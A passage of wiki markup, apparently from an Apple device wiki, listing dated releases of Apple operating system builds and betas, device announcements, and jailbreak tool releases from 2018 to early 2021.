* 15 February -- watchOS 7.3.1 for [[Apple Watch Series 5]] and [[Apple Watch SE]] and macOS 11.2.1 (20D75) released.&lt;br /&gt;
* 9 February -- macOS 11.2.1 (20D74) released.&lt;br /&gt;
* 4 February -- Revised iOS/iPadOS 14.5 beta released.&lt;br /&gt;
* 2 February -- macOS 11.3 beta released.&lt;br /&gt;
* 1 February -- audioOS 14.5 beta, iOS/iPadOS 14.5 beta, tvOS 14.5 beta, and watchOS 7.4 beta released.&lt;br /&gt;
&lt;br /&gt;
=== January ===&lt;br /&gt;
* 28 January -- macOS 11.2 [[Release Candidate|RC]] 3 released.&lt;br /&gt;
* 26 January -- audioOS 14.4, iOS/iPadOS 14.4, tvOS 14.4, and watchOS 7.3 released.&lt;br /&gt;
* 25 January -- macOS 11.2 [[Release Candidate|RC]] 2 released.&lt;br /&gt;
* 21 January -- audioOS 14.4 [[Release Candidate|RC]], macOS 11.2 [[Release Candidate|RC]], iOS/iPadOS 14.4 [[Release Candidate|RC]], tvOS 14.4 [[Release Candidate|RC]], and watchOS 7.3 [[Release Candidate|RC]] released.&lt;br /&gt;
* 13 January -- audioOS 14.4 beta 2, macOS 11.2 beta 2, iOS/iPadOS 14.4 beta 2, tvOS 14.4 beta 2, and watchOS 7.3 beta 2 released.&lt;br /&gt;
* 11 January -- iOS/iPadOS 12.5.1 released.&lt;br /&gt;
&lt;br /&gt;
== 2020 ==&lt;br /&gt;
=== December ===&lt;br /&gt;
* 16 December -- audioOS 14.4 beta, macOS 11.2 beta, iOS/iPadOS 14.4 beta, tvOS 14.4 beta, and watchOS 7.3 beta released.&lt;br /&gt;
* 15 December -- audioOS 14.3 released.&lt;br /&gt;
* 14 December -- bridgeOS 5.1, macOS 11.1, iOS/iPadOS 12.5 and 14.3, tvOS 14.3, Apple TV Software Update 7.6.2/iOS 8.4.6, and watchOS 6.3 and 7.2 released.&lt;br /&gt;
* 10 December -- macOS 11.1 [[Release Candidate|RC]], iOS/iPadOS 14.3 [[Release Candidate|RC]] 2 released.&lt;br /&gt;
* 8 December -- audioOS 14.3 [[Release Candidate|RC]], iOS/iPadOS 14.3 [[Release Candidate|RC]], tvOS 14.3 [[Release Candidate|RC]], and watchOS 7.2 [[Release Candidate|RC]] released.&lt;br /&gt;
* 7 December -- audioOS 14.2.1 released.&lt;br /&gt;
* 2 December -- [[Chimera]] updated to support up to 12.4.9 on pre-A12. audioOS 14.3 beta 3, iOS/iPadOS 14.3 beta 3, tvOS 14.3 beta 3, and watchOS 7.2 beta 3 released.&lt;br /&gt;
&lt;br /&gt;
=== November ===&lt;br /&gt;
* 20 November -- [[Odyssey]] 1.2 released for iOS 13.0-13.7.&lt;br /&gt;
* 19 November -- iOS 14.2.1 for all iPhone 12 models released.&lt;br /&gt;
* 18 November -- iOS 14.2 (18B111) for all iPhone 12 models, audioOS 14.3 beta 2, tvOS 14.3 beta 2, and watchOS 7.2 beta 2 released.&lt;br /&gt;
* 17 November -- iOS/iPadOS 14.3 beta 2 released.&lt;br /&gt;
* 12 November -- audioOS 14.3 beta, iOS/iPadOS 14.3 beta, tvOS 14.3 beta, and watchOS 7.2 beta released.&lt;br /&gt;
* 5 November -- audioOS 14.2, iOS/iPadOS 12.4.9 and 14.2, tvOS 14.2, watchOS 5.3.9, 6.2.9 and 7.1, and 7.6.1/8.4.4 (12H911) for [[Apple TV (3rd generation)]] released. &lt;br /&gt;
* 2 November —- tvOS 14.2 RC and watchOS 7.1 RC released.&lt;br /&gt;
&lt;br /&gt;
=== October ===&lt;br /&gt;
* 30 October —- iOS/iPadOS 14.2 Release Candidate (RC) released.&lt;br /&gt;
* 22 October -- watchOS 7.1 beta 4 released.&lt;br /&gt;
* 20 October -- iOS/iPadOS 14.1, audioOS 14.1, and tvOS 14.2 beta 4 released. &lt;br /&gt;
* 19 October -- watchOS 7.0.3 for [[Apple Watch Series 3]] released.&lt;br /&gt;
* 13 October -- audioOS 14.2 beta 3, iOS/iPadOS 14.1 [[Golden Master|GM]], 14.2 beta 3, tvOS 14.2 beta 3, and watchOS 7.1 beta 3 released. [[iPhone 12 mini]], [[iPhone 12]], [[iPhone 12 Pro]], and [[iPhone 12 Pro Max]] announced.&lt;br /&gt;
* 12 October -- watchOS 7.0.2 released.&lt;br /&gt;
* 5 October -- tvOS 14.0.2 released.&lt;br /&gt;
&lt;br /&gt;
=== September ===&lt;br /&gt;
* 29 September -- audioOS 14.2 beta 2, iOS/iPadOS 14.2 beta 2, tvOS 14.2 beta 2, and watchOS 7.1 beta 2 released.&lt;br /&gt;
* 24 September -- iOS/iPadOS 14.0.1, tvOS 14.0.1 and watchOS 7.0.1 released. &lt;br /&gt;
* 23 September -- iPadOS 14.2 beta (18B5052i) for [[iPad (8th generation)]] released.&lt;br /&gt;
* 17 September -- audioOS 14.2 beta, iOS/iPadOS 14.2 beta, tvOS 14.2 beta, and watchOS 7.1 beta released.&lt;br /&gt;
* 16 September -- iOS/iPadOS 14.0, tvOS 14.0, watchOS 7.0, and 7.6/8.4.4 (12H903) for [[Apple TV (3rd generation)]] released. &lt;br /&gt;
* 15 September -- iOS/iPadOS 14.0 [[Golden Master|GM]], tvOS 14.0 [[Golden Master|GM]], and watchOS 7.0 [[Golden Master|GM]] released. [[iPad (8th generation)]], [[iPad Air (4th generation)]], [[Apple Watch SE]] and [[Apple Watch Series 6]] announced at &amp;quot;Time Flies&amp;quot; Event.&lt;br /&gt;
* 9 September -- audioOS 14.1 beta 8, iOS/iPadOS 14.0 beta 8, tvOS 14.0 beta 8, and watchOS 7.0 beta 8 released.&lt;br /&gt;
* 3 September -- audioOS 14.1 beta 7, iOS/iPadOS 14.0 beta 7, and tvOS 14.0 beta 7 released.&lt;br /&gt;
* 1 September -- iOS/iPadOS 13.7  released.&lt;br /&gt;
&lt;br /&gt;
=== August ===&lt;br /&gt;
* 29 August -- [[Odyssey]] released to jailbreak iOS/iPadOS 13.0-13.5 on A9-A13 semi-untethered.&lt;br /&gt;
* 26 August -- iOS/iPadOS 13.7 beta released.&lt;br /&gt;
* 25 August -- audioOS 14.1 beta 6, iOS/iPadOS 14.0 beta 6, tvOS 14.0 beta 6, and watchOS 7.0 beta 6 released.&lt;br /&gt;
* 18 August -- audioOS 14.1 beta 5, iOS/iPadOS 14.0 beta 5, tvOS 14.0 beta 5, and watchOS 7.0 beta 5 released.&lt;br /&gt;
* 12 August -- iOS/iPadOS 13.6.1 released.&lt;br /&gt;
* 4 August -- audioOS 14 beta 4, iOS/iPadOS 14.0 beta 4, tvOS 14.0 beta 4, and watchOS 7.0 beta 4 released.&lt;br /&gt;
&lt;br /&gt;
=== July ===&lt;br /&gt;
* 22 July -- audioOS 14 beta 3, iOS/iPadOS 14.0 beta 3, tvOS 14.0 beta 3, and watchOS 7.0 beta 3 released.&lt;br /&gt;
* 9 July -- iOS/iPadOS 13.6 [[Golden Master|GM]], tvOS 13.4.8 [[Golden Master|GM]], and watchOS 6.2.8 [[Golden Master|GM]] released. First public beta's of iOS 14 and tvOS 14 released. &lt;br /&gt;
* 7 July -- audioOS 14 beta 2, iOS/iPadOS 14.0 beta 2, tvOS 14.0 beta 2, and watchOS 7.0 beta 2 released.&lt;br /&gt;
&lt;br /&gt;
=== June ===&lt;br /&gt;
* 30 June -- iOS/iPadOS 13.6 beta 3, tvOS 13.4.8 beta 3, and watchOS 6.2.8 beta 3 released.&lt;br /&gt;
* 22 June -- audioOS 14 beta, iOS 14, tvOS 14 and watchOS 7 announced with first beta released. &lt;br /&gt;
* 10 June -- watchOS 6.2.8 beta 2 released.&lt;br /&gt;
* 9 June -- iOS/iPadOS 13.6 beta 2 and tvOS 13.4.8 beta 2 released.&lt;br /&gt;
* 3 June -- tvOS 13.4.8 beta and watchOS 6.2.8 beta released.&lt;br /&gt;
* 1 June -- audioOS 13.4.6, iOS/iPadOS 13.5.1 and 13.5.5 beta, tvOS 13.4.6 and watchOS 6.2.6 released.&lt;br /&gt;
&lt;br /&gt;
=== May ===&lt;br /&gt;
* 26 May -- [[unc0verTV]] 5.1.0~b1 released to jailbreak [[J42dAP|Apple TV HD]] and [[J105aAP|Apple TV 4K]] running tvOS 11.0 through 13.4.5.&lt;br /&gt;
* 23 May -- [[unc0ver]] updated to 5.0.0 to jailbreak devices running iOS 11.0 through 13.5.&lt;br /&gt;
* 20 May -- iOS 12.4.7, iOS/iPadOS 13.5, tvOS 13.4.5 and audioOS 13.4.5 released.&lt;br /&gt;
* 18 May -- iOS/iPadOS 13.5 [[Golden Master|GM]], tvOS 13.4.5 [[Golden Master|GM]], watchOS 5.3.7 and watchOS 6.2.5 released.&lt;br /&gt;
* 14 May -- watchOS 6.2.5 beta 5 released.&lt;br /&gt;
* 6 May -- iOS/iPadOS 13.5 beta 4, tvOS 13.4.5 beta 4 and watchOS 6.2.5 beta 4 released.&lt;br /&gt;
&lt;br /&gt;
=== April ===&lt;br /&gt;
* 29 April -- iOS/iPadOS 13.5 beta 3, tvOS 13.4.5 beta 3, and watchOS 6.2.5 beta 3 released.&lt;br /&gt;
* 23 April -- iOS 13.4.1 released for [[D79AP|iPhone SE (2nd generation)]].&lt;br /&gt;
* 15 April -- iOS/iPadOS 13.4.5 beta 2, tvOS 13.4.5 beta 2, and watchOS 6.2.5 beta 2 released.&lt;br /&gt;
* 8 April -- watchOS 6.2.1 released.&lt;br /&gt;
* 7 April -- iOS/iPadOS 13.4.1 released.&lt;br /&gt;
* 1 April -- watchOS 6.2.5 beta released.&lt;br /&gt;
&lt;br /&gt;
=== March ===&lt;br /&gt;
* 31 March -- iOS/iPadOS 13.4.5 beta and tvOS 13.4.5 beta released.&lt;br /&gt;
* 24 March -- audioOS 13.4, bridgeOS 4.4, iOS 12.4.6, iOS/iPadOS 13.4, tvOS 13.4, Apple TV Software Update 7.5, watchOS 5.3.6 and 6.2 released.&lt;br /&gt;
* 18 March -- iOS/iPadOS 13.4 beta 6, tvOS 13.4 beta 6 and watchOS 6.2 beta 6 released.&lt;br /&gt;
* 11 March -- watchOS 6.2 beta 5 released.&lt;br /&gt;
* 10 March -- iOS/iPadOS 13.4 beta 5 and tvOS 13.4 beta 5 released.&lt;br /&gt;
* 4 March -- watchOS 6.2 beta 4 released.&lt;br /&gt;
* 3 March -- iOS/iPadOS 13.4 beta 4 and tvOS 13.4 beta 4 released.&lt;br /&gt;
&lt;br /&gt;
=== February ===&lt;br /&gt;
* 26 February -- iOS/iPadOS 13.4 beta 3, tvOS 13.4 beta 3 and watchOS 6.2 beta 3 released.&lt;br /&gt;
* 25 February -- [[unc0ver]] updated to support A8-A11 devices running iOS/iPadOS 13.0-13.3.&lt;br /&gt;
* 19 February -- iOS/iPadOS 13.4 beta 2, tvOS 13.4 beta 2 and watchOS 6.2 beta 2 released.&lt;br /&gt;
* 18 February -- watchOS 5.3.5 released.&lt;br /&gt;
* 15 February -- [[unc0ver]] updated to support A12 and A13 devices running iOS/iPadOS 13.0-13.3.&lt;br /&gt;
* 5 February -- iOS/iPadOS 13.4 beta, tvOS 13.4 beta and watchOS 6.2 beta released.&lt;br /&gt;
&lt;br /&gt;
=== January ===&lt;br /&gt;
* 28 January -- iOS/iPadOS 13.3.1, tvOS 13.3.1, watchOS 6.1.2 and iOS 12.4.5 released.&lt;br /&gt;
* 22 January -- iOS/iPadOS 13.3.1 beta 3, tvOS 13.3.1 beta 3 and watchOS 6.1.2 beta 3 released.&lt;br /&gt;
* 17 January -- iOS/iPadOS 13.3.1 beta 2, tvOS 13.3.1 beta 2 and watchOS 6.1.2 beta 2 released.&lt;br /&gt;
&lt;br /&gt;
== 2019 ==&lt;br /&gt;
=== December ===&lt;br /&gt;
* 17 December -- iOS/iPadOS 13.3.1 beta, tvOS 13.3.1 beta and watchOS 6.1.2 beta released.&lt;br /&gt;
* 10 December -- audioOS 13.3, iOS/iPadOS 13.3, tvOS 13.3 and watchOS 6.1.1 released&lt;br /&gt;
* 5 December -- iOS/iPadOS 13.3 beta 4, tvOS 13.3 beta 4 and watchOS 6.1.1 beta 4 released.&lt;br /&gt;
&lt;br /&gt;
=== November ===&lt;br /&gt;
* 20 November -- iOS/iPadOS 13.3 beta 3, tvOS 13.3 beta 3 and watchOS 6.1.1 beta 3 released.&lt;br /&gt;
* 18 November -- iOS/iPadOS 13.2.3 released.&lt;br /&gt;
* 12 November -- iOS/iPadOS 13.3 beta 2, tvOS 13.3 beta 2 and watchOS 6.1.1 beta 2 released.&lt;br /&gt;
* 10 November -- [[checkra1n]] beta 0.9 released.&lt;br /&gt;
* 7 November -- iOS/iPadOS 13.2.2 released.&lt;br /&gt;
* 5 November -- iOS/iPadOS 13.3 beta, tvOS 13.3 beta and watchOS 6.1.1 beta released.&lt;br /&gt;
&lt;br /&gt;
=== October ===&lt;br /&gt;
* 30 October -- audioOS 13.2.1 released.&lt;br /&gt;
* 29 October -- watchOS 5.3.3 and 6.1 released.&lt;br /&gt;
* 28 October -- iOS/iPadOS 13.2, iOS 12.4.3, audioOS 13.2 and tvOS 13.2 released.&lt;br /&gt;
* 23 October -- iOS/iPadOS 13.2 beta 4, watchOS 6.1 beta 5 and tvOS 13.2 beta 4 released.&lt;br /&gt;
* 16 October -- iOS/iPadOS 13.2 beta 3, watchOS 6.1 beta 4 and tvOS 13.2 beta 3 released.&lt;br /&gt;
* 15 October -- iOS/iPadOS 13.1.3 released.&lt;br /&gt;
* 10 October -- iOS/iPadOS 13.2 beta 2, watchOS 6.1 beta 3 and tvOS 13.2 beta 2 released.&lt;br /&gt;
* 9 October -- watchOS 5.3.2 for [[Apple Watch Series 4]] released.&lt;br /&gt;
* 7 October -- [[bridgeOS]] 4.0 released.&lt;br /&gt;
* 2 October -- iOS/iPadOS 13.2 beta, watchOS 6.1 beta 2 and tvOS 13.2 beta released.&lt;br /&gt;
&lt;br /&gt;
=== September ===&lt;br /&gt;
* 30 September -- iOS/iPadOS 13.1.2, watchOS 6.0.1, and watchOS 5.3.2 for [[Apple Watch Series 3]] released.&lt;br /&gt;
* 27 September -- iOS/iPadOS 13.1.1 released.&lt;br /&gt;
* 26 September -- iOS 12.4.2 for [[iPad Air]], [[iPad mini 2]], [[iPad mini 3]], [[iPhone 5s]], [[N61AP|iPhone 6]], [[N56AP|iPhone 6 Plus]], [[N102AP|iPod touch (6th generation)]], and watchOS 5.3.2 for [[Apple Watch Series 1]] and [[Apple Watch Series 2]] released.&lt;br /&gt;
* 24 September -- iOS/iPadOS 13.1 and tvOS 13.0 released.&lt;br /&gt;
* 23 September -- watchOS 6.1 beta released.&lt;br /&gt;
* 22 September -- [[unc0ver]] updated to v3.7.0b1 with iOS 12.0-12.4 support (excluding iOS 12.3-12.3.1) for A12/A12X devices.&lt;br /&gt;
* 20 September -- [[iPhone 11]], [[iPhone 11 Pro]], [[iPhone 11 Pro Max]] available to purchase. tvOS 13 beta 11 renamed to [[Golden Master|GM]].&lt;br /&gt;
* 19 September -- iOS 13.0 for [[List of iPhones|iPhones]] and watchOS 6.0 released.&lt;br /&gt;
* 18 September -- iOS/iPadOS 13.1 beta 4 and tvOS 13.0 beta 11 released.&lt;br /&gt;
* 13 September -- [[N104AP|iPhone 11]], [[D421AP|iPhone 11 Pro]], and [[D431AP|iPhone 11 Pro Max]] available for pre-order.&lt;br /&gt;
* 11 September -- watchOS 6.0 [[Golden Master|GM]] released.&lt;br /&gt;
* 10 September -- '''By Innovation Only 2019''' event announcing [[Apple Watch Series 5]], [[iPad (7th generation)]], [[iPhone 11]], [[iPhone 11 Pro]], [[iPhone 11 Pro Max]]. iOS/iPadOS 13.1 beta 3, tvOS 13.0 beta 10, and iOS 13.0 [[Golden Master|GM]] (excluding iPod touch) released.&lt;br /&gt;
* 4 September -- iOS/iPadOS 13.1 beta 2 and tvOS 13.0 beta 9 released.&lt;br /&gt;
&lt;br /&gt;
=== August ===&lt;br /&gt;
* 27 August -- iOS/iPadOS 13.1 beta, tvOS 13.0 beta 8 and watchOS 6.0 beta 9 released.&lt;br /&gt;
* 26 August -- iOS 12.4.1, tvOS 12.4.1, and watchOS 5.3.1 released.&lt;br /&gt;
* 21 August -- iOS/iPadOS 13.0 beta 8 and watchOS 6.0 beta 8 released. [[Chimera|ChimeraTV]] updated to support tvOS 12.4.&lt;br /&gt;
* 19 August -- [[Chimera]] updated to 1.2.8 with iOS 12.4 support (excluding iOS 12.3-12.3.2) for A9-A11 devices.&lt;br /&gt;
* 18 August -- [[unc0ver]] updated to v3.5.0 with iOS 12.4 support (excluding iOS 12.3-12.3.2) for non A12 devices.&lt;br /&gt;
* 15 August -- iOS/iPadOS 13.0 beta 7, tvOS 13.0 beta 7 and watchOS 6.0 beta 7 released.&lt;br /&gt;
* 7 August -- iOS/iPadOS 13.0 beta 6, tvOS 13.0 beta 6 and watchOS 6.0 beta 6 released.&lt;br /&gt;
&lt;br /&gt;
=== July ===&lt;br /&gt;
* 30 July -- watchOS 6.0 beta 5 released.&lt;br /&gt;
* 29 July -- iOS/iPadOS 13.0 beta 5 and tvOS 13.0 beta 5 released.&lt;br /&gt;
* 22 July -- iOS 12.4, iOS 10.3.4 for [[iPad (4th generation)]] and [[iPhone 5]], iOS 9.3.6 for [[K95AP|iPad2,3]], [[iPad mini|iPad2,6 iPad2,7]] [[iPad (3rd generation)|iPad3,2 iPad3,3]] and [[N94AP|iPhone 4s]], tvOS 12.4, watchOS 5.3, audioOS 12.4, and iBridge 3.6 released.&lt;br /&gt;
* 17 July -- iOS/iPadOS 13.0 beta 4, tvOS 13.0 beta 4 and watchOS 6.0 beta 4 released.&lt;br /&gt;
* 16 July -- iOS 12.4 beta 7, and watchOS 5.3 beta 6 released.&lt;br /&gt;
* 14 July -- [[Chimera]] updated to 1.2.3 to include support for some iOS 12.3 betas on A9-A11 devices. It was also updated to 1.2.2 for Apple TV 4K support up to tvOS 12.2.&lt;br /&gt;
* 12 July -- [[Chimera]] updated to 1.2.0 to include support for iOS 12.1.3-12.2 on A9-A11 devices.&lt;br /&gt;
* 11 July -- [[unc0ver]] updated to v3.3.0~b1 to include support for iOS 12.1.3-12.2 on A7-A11 devices.&lt;br /&gt;
* 9 July -- iOS 12.4 beta 6 and watchOS 5.3 beta 5 released.&lt;br /&gt;
* 8 July -- iOS/iPadOS 13.0 beta 3 (17A5522g) released.&lt;br /&gt;
* 2 July -- iOS/iPadOS 13.0 beta 3 (17A5522f), tvOS 13.0 beta 3 and watchOS 6.0 beta 3 released.&lt;br /&gt;
&lt;br /&gt;
=== June ===&lt;br /&gt;
* 24 June -- iOS 12.4 beta 5 and watchOS 5.3 beta 4 released.&lt;br /&gt;
* 17 June -- iOS/iPadOS 13.0 beta 2, tvOS 13.0 beta 2 and watchOS 6.0 beta 2 released.&lt;br /&gt;
* 11 June -- iOS 12.4 beta 4, tvOS 12.4 beta 3 and watchOS 5.3 beta 3 released.&lt;br /&gt;
* 10 June -- iOS 12.3.2 for [[iPhone 8 Plus]] released.&lt;br /&gt;
* 3 June -- [[WWDC]] 2019. iOS/iPadOS 13.0 beta, tvOS 13.0 beta and watchOS 6.0 beta released.&lt;br /&gt;
&lt;br /&gt;
=== May ===&lt;br /&gt;
* 29 May -- iOS 12.3.1 (16F8202) IPSW released for [[N112AP|iPod touch (7th generation)]].&lt;br /&gt;
* 28 May -- [[N112AP|iPod touch (7th generation)]] announced and available to order. iOS 12.3.1 (16F8202) OTA released for it. iOS 12.4 beta 3, tvOS 12.4 beta 2, and watchOS 5.3 beta 2 released.&lt;br /&gt;
* 24 May -- iOS 12.3.1 released.&lt;br /&gt;
* 20 May -- iOS 12.4 beta 2 released.&lt;br /&gt;
* 15 May -- iOS 12.4 beta, tvOS 12.4 beta and watchOS 5.3 beta released.&lt;br /&gt;
* 13 May -- iOS 12.3, tvOS 12.3, watchOS 5.2.1, audioOS 12.3 and Apple TV Software 7.3 released.&lt;br /&gt;
* 10 May -- iOS 12.3 beta 6 released.&lt;br /&gt;
* 7 May -- iOS 12.3 beta 5, tvOS 12.3 beta 5, Apple TV Software 7.3 beta 4 and watchOS 5.2.1 beta 5 released.&lt;br /&gt;
&lt;br /&gt;
=== April ===&lt;br /&gt;
* 30 April -- [[Chimera]] jailbreak for all devices running iOS 12.0-12.1.2 and tvOS 12.0-12.1.1 released.&lt;br /&gt;
* 29 April -- iOS 12.3 beta 4, tvOS 12.3 beta 4, Apple TV Software 7.3 beta 3 and watchOS 5.2.1 beta 4 released.&lt;br /&gt;
* 22 April -- iOS 12.3 beta 3, tvOS 12.3 beta 3, Apple TV Software 7.3 beta 2 and watchOS 5.2.1 beta 3 released.&lt;br /&gt;
* 10 April -- tvOS 12.2.1 released.&lt;br /&gt;
* 8 April -- iOS 12.3 beta 2, tvOS 12.3 beta 2 and watchOS 5.2.1 beta 2 released.&lt;br /&gt;
&lt;br /&gt;
=== March ===&lt;br /&gt;
* 28 March -- watchOS 5.2.1 beta released.&lt;br /&gt;
* 27 March -- iOS 12.3 beta, tvOS 12.3 beta, Apple TV Software 7.3 beta and watchOS 5.2 released.&lt;br /&gt;
* 25 March -- iOS 12.2, tvOS 12.2 and audioOS 12.2 released.&lt;br /&gt;
* 20 March -- [[AirPods (2nd generation)]] revealed.&lt;br /&gt;
* 18 March -- [[iPad Air (3rd generation)]] and [[iPad mini (5th generation)]] revealed. iOS 12.2 beta 6, tvOS 12.2 beta 6 and watchOS 5.2 beta 6 released.&lt;br /&gt;
* 11 March -- iOS 12.2 beta 5, tvOS 12.2 beta 5 and watchOS 5.2 beta 5 released.&lt;br /&gt;
* 4 March -- iOS 12.2 beta 4, tvOS 12.2 beta 4 and watchOS 5.2 beta 4 released.&lt;br /&gt;
&lt;br /&gt;
=== February ===&lt;br /&gt;
* 20 February -- [[Electra]] updated to support jailbreaking tvOS 11.0-11.4.1.&lt;br /&gt;
* 19 February -- iOS 12.2 beta 3, tvOS 12.2 beta 3 and watchOS 5.2 beta 3 released.&lt;br /&gt;
* 7 February -- iOS 12.1.4 released.&lt;br /&gt;
* 4 February -- iOS 12.2 beta 2, tvOS 12.2 beta 2 and watchOS 5.2 beta 2 released.&lt;br /&gt;
&lt;br /&gt;
=== January ===&lt;br /&gt;
* 30 January -- [[Electra]] and [[unc0ver]] updated to support jailbreaking iOS 11.4 and 11.4.1.&lt;br /&gt;
* 24 January -- iOS 12.2 beta, tvOS 12.2 beta and watchOS 5.2 beta released.&lt;br /&gt;
* 22 January -- iOS 12.1.3, tvOS 12.1.2, watchOS 5.1.3 and audioOS 12.1.3 released.&lt;br /&gt;
* 10 January -- iOS 12.1.3 beta 4 released.&lt;br /&gt;
* 7 January -- iOS 12.1.3 beta 3, tvOS 12.1.2 beta 3 and watchOS 5.1.3 beta 3 released.&lt;br /&gt;
&lt;br /&gt;
== 2018 ==&lt;br /&gt;
=== December ===&lt;br /&gt;
* 20 December -- iOS 12.1.2 (16C104) released for iPhone.&lt;br /&gt;
* 19 December -- iOS 12.1.3 beta 2, tvOS 12.1.2 beta 2 and watchOS 5.1.3 beta 2 released.&lt;br /&gt;
* 17 December -- iOS 12.1.2 (16C101) released for iPhone.&lt;br /&gt;
* 10 December -- iOS 12.1.2 beta, tvOS 12.1.2 beta, and watchOS 5.1.3 beta released.&lt;br /&gt;
* 6 December -- watchOS 5.1.2 released.&lt;br /&gt;
* 5 December -- iOS 12.1.1, tvOS 12.1.1 and audioOS 12.1.1 released.&lt;br /&gt;
&lt;br /&gt;
=== November ===&lt;br /&gt;
* 29 November -- tvOS 12.1.1 beta 4 released.&lt;br /&gt;
* 15 November -- iOS 12.1.1 beta 3, tvOS 12.1.1 beta 3, and watchOS 5.1.2 beta 2 released.&lt;br /&gt;
* 7 November -- [[iPad Pro (11-inch)]], [[iPad Pro (12.9-inch) (3rd generation)]] and [[Apple Pencil (2nd generation)]] available for purchase. iOS 12.1.1 beta 2, tvOS 12.1.1 beta 2, and watchOS 5.1.2 beta released.&lt;br /&gt;
* 6 November -- iOS 12.1 (16B94) released for [[N841AP|iPhone XR]].&lt;br /&gt;
* 5 November -- watchOS 5.1.1 released.&lt;br /&gt;
&lt;br /&gt;
=== October ===&lt;br /&gt;
* 31 October -- iOS 12.1.1 beta and tvOS 12.1.1 beta released.&lt;br /&gt;
* 30 October -- [[iPad Pro (11-inch)]], [[iPad Pro (12.9-inch) (3rd generation)]] and [[Apple Pencil (2nd generation)]] announced and available for pre-order. iOS 12.1, tvOS 12.1 and watchOS 5.1 released.&lt;br /&gt;
* 26 October -- [[N841AP|iPhone XR]] available for purchase.&lt;br /&gt;
* 22 October -- iOS 12.1 beta 5, tvOS 12.1 beta 5 and watchOS 5.1 beta 5 released.&lt;br /&gt;
* 19 October -- [[N841AP|iPhone XR]] available for pre-order.&lt;br /&gt;
* 15 October -- iOS 12.1 beta 4, tvOS 12.1 beta 4 and watchOS 5.1 beta 4 released.&lt;br /&gt;
* 9 October -- iOS 12.1 beta 3, tvOS 12.1 beta 3 and watchOS 5.1 beta 3 released.&lt;br /&gt;
* 8 October -- iOS 12.0.1 released.&lt;br /&gt;
* 2 October -- iOS 12.1 beta 2, tvOS 12.1 beta 2 and watchOS 5.1 beta 2 released.&lt;br /&gt;
&lt;br /&gt;
=== September ===&lt;br /&gt;
* 27 September -- watchOS 5.0.1 released.&lt;br /&gt;
* 24 September -- tvOS 12.0.1 released. &lt;br /&gt;
* 21 September -- [[Apple Watch Series 4]], [[D321AP|iPhone XS]] and [[iPhone XS Max]] available for purchase.&lt;br /&gt;
* 18 September -- iOS 12.1 beta, tvOS 12.1 beta and watchOS 5.1 beta released.&lt;br /&gt;
* 17 September -- audioOS 12.0, iOS 12.0, tvOS 12.0 and watchOS 5.0 released.&lt;br /&gt;
* 14 September -- [[Apple Watch Series 4]], [[D321AP|iPhone XS]] and [[iPhone XS Max]] available for pre-order.&lt;br /&gt;
* 12 September -- [[Apple Watch Series 4]], [[N841AP|iPhone XR]], [[D321AP|iPhone XS]] and [[iPhone XS Max]] announced. iOS 12.0 [[Golden Master|GM]], tvOS 12.0 [[Golden Master|GM]] and watchOS 5.0 [[Golden Master|GM]] released.&lt;br /&gt;
&lt;br /&gt;
=== August ===&lt;br /&gt;
* 31 August -- iOS 12.0 beta 12, tvOS 12.0 beta 10 and watchOS 12.0 beta 10 released.&lt;br /&gt;
* 27 August -- iOS 12.0 beta 11 and tvOS 12.0 beta 9 released.&lt;br /&gt;
* 24 August -- watchOS 5.0 beta 9 released&lt;br /&gt;
* 23 August -- iOS 12.0 beta 10 released.&lt;br /&gt;
* 20 August -- iOS 12.0 beta 9, tvOS 12.0 beta 8 and watchOS 5.0 beta 8 released.&lt;br /&gt;
* 15 August -- iOS 12.0 beta 8 released.&lt;br /&gt;
* 13 August -- iOS 12.0 beta 7, tvOS 12.0 beta 7 and watchOS 5.0 beta 7 released.&lt;br /&gt;
* 6 August -- iOS 12.0 beta 6, tvOS 12.0 beta 6 and watchOS 5.0 beta 6 released.&lt;br /&gt;
&lt;br /&gt;
=== July ===&lt;br /&gt;
* 30 July -- iOS 12.0 beta 5, tvOS 12.0 beta 5 and watchOS 5.0 beta 5 released.&lt;br /&gt;
* 17 July -- iOS 12.0 beta 4, tvOS 12.0 beta 4 and watchOS 5.0 beta 4 released.&lt;br /&gt;
* 12 July -- [[Electra|ElectraTV]] released to jailbreak tvOS 11.2-11.3.&lt;br /&gt;
* 9 July -- audioOS 11.4.1, iOS 11.4.1, tvOS 11.4.1, and watchOS 4.3.2 released.&lt;br /&gt;
* 8 July -- [[backr00m]] released to jailbreak tvOS 10.2.2-11.1.&lt;br /&gt;
* 6 July -- [[Electra]] updated to jailbreak iOS 11.2-11.3.1.&lt;br /&gt;
* 3 July -- iOS 12.0 beta 3, tvOS 12.0 beta 3 and watchOS 5.0 beta 3 released.&lt;br /&gt;
* 2 July -- iOS 11.4.1 beta 5 released.&lt;br /&gt;
&lt;br /&gt;
=== June ===&lt;br /&gt;
* 25 June -- iOS 11.4.1 beta 4, tvOS 11.4.1 beta 4, and watchOS 4.3.2 beta 3 released.&lt;br /&gt;
* 19 June -- iOS 12.0 beta 2, tvOS 12.0 beta 2 and watchOS 5.0 beta 2 released.&lt;br /&gt;
* 18 June -- iOS 11.4.1 beta 3 and tvOS 11.4.1 beta 3 released.&lt;br /&gt;
* 13 June -- watchOS 4.3.2 beta 2 released.&lt;br /&gt;
* 11 June -- iOS 11.4.1 beta 2, tvOS 11.4.1 beta 2, and watchOS 5.0 beta (build 16R5283r) released.&lt;br /&gt;
* 4 June -- iOS 12.0 beta, tvOS 12.0 beta and watchOS 5.0 beta (build 16R5283q) released. [[WWDC]] event.&lt;br /&gt;
&lt;br /&gt;
=== May ===&lt;br /&gt;
* 30 May -- iOS 11.4.1 beta, tvOS 11.4.1 beta and watchOS 4.3.2 beta released.&lt;br /&gt;
* 29 May -- iOS 11.4, tvOS 11.4, watchOS 4.3.1 and audioOS 11.4 released.&lt;br /&gt;
* 17 May -- iOS 11.4 beta 6 released.&lt;br /&gt;
* 14 May -- iOS 11.4 beta 5, tvOS 11.4 beta 5 and watchOS 4.3.1 beta 5 released.&lt;br /&gt;
* 7 May -- iOS 11.4 beta 4, tvOS 11.4 beta 4 and watchOS 4.3.1 beta 4 released.&lt;br /&gt;
* 1 May -- iOS 11.4 beta 3, tvOS 11.4 beta 3 and watchOS 4.3.1 beta 3 released.&lt;br /&gt;
&lt;br /&gt;
=== April ===&lt;br /&gt;
* 24 April -- iOS 11.3.1 released.&lt;br /&gt;
* 16 April -- iOS 11.4 beta 2, tvOS 11.4 beta 2 and watchOS 4.3.1 beta 2 released.&lt;br /&gt;
* 2 April -- iOS 11.4 beta, tvOS 11.4 beta and watchOS 4.3.1 beta released.&lt;br /&gt;
&lt;br /&gt;
=== March ===&lt;br /&gt;
